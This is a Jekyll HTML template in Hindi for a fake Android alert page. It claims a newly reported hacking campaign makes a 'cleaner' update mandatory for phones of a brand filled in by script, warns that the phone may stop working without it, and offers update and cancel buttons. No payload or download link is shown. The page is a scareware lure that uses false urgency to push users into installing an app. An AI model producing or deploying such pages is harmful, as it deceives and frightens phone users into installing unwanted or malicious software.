---
layout: default
---

<div class=t>
  <h1 class=bl><script>document.write(rs)</script> क्लीनर को अपडेट करना आवश्यक है</h1>
  <p>Android फ़ोन को लक्ष्य बनाकर किये गए एक हैकिंग कार्यक्रम की ताज़ा रिपोर्ट के अनुसार हमने एक क्लीनर अपडेट जारी किया है जो कि सभी
    <script>document.write(rs)</script>
    फोन के लिए आवश्यक है।</p><br>
  <img src=1.png width=80 height=80>
  <p>अगर आप अपडेट नहीं करेंगे तो आपका <a class=bl>फोन काम करना बंद कर सकता है</a>।</p>
</div>
<br>
<div class=s>
  <a class=b href=#>
    <span> {{page.text1}} </span></a>
  <a class=b href=#><span> रद्द करें</span>
  </a>
</div>
